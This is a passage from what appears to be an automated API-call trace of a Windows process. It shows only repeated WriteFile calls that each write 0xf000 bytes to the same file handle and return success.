[0173.592] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.593] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.593] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.594] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.596] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.596] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.597] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.598] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.601] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.602] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.602] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.603] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.604] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.605] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.605] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.606] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.606] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.616] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.616] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.616] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.617] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.618] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.618] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.618] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.619] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.620] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.620] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.620] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.621] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.622] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.622] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.622] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.624] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0173.624] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.293] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.293] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.293] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.293] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.294] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.295] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.295] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.295] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.420] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.420] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.420] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.420] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.428] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.429] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.429] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.429] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.430] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.439] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.439] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.440] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.440] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.441] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.441] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.441] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.442] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.442] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.443] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.444] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.444] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.444] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.445] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.445] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.446] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0174.446] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.300] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.300] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.301] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.301] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.302] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.302] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.303] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.303] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.304] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.304] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.304] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.305] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.305] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.306] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.306] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.306] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.307] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.317] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.317] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.318] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.318] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.319] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.319] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.319] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.319] WriteFile (in: hFile=0x1cc, lpBuffer=0x3cfcac8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x3cfcac8*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0175.320] WriteFile (in: hFile=0x1cc, 